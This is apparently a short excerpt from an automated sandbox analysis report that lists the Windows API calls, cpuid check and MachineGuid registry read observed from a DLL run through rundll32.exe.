Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E4742EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E46C0BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6E474110
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454BA6 cpuid 3_2_6E454BA6
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454F17 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6E454F17